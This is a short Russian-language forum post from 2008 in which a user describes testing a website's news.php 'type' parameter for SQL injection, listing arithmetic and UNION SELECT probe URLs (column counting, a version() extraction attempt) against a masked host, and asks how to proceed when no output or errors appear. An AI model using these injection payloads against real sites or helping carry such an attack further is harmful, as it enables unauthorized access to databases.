04.11.2008, 17:00
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Вобщем такая ситуация:
Есть сайт: http://www.xxx.com/news.php?type=16 (Выводит новость)
При запросе: http://www.xxx.com/news.php?type=17-1 (Выводдит ту же самую новость)
При запросе: http://www.xxx.com/news.php?type=17 (Выводдит "Новость не существует")
-------------------------------------------------------------
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4,5/* (Выводдит "Новость не существует")
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,2,3,4/* (Выводдит новость с id 16)
При запросе: http://www.xxxx.com/news.php?type=16+union+select+1,version(),3,4/* (Выводдит новость с id 16)
Вобщем нет никаких ошибок( хотя SQL Inj присутствует ... что делать в такой ситуации ?
|
|
|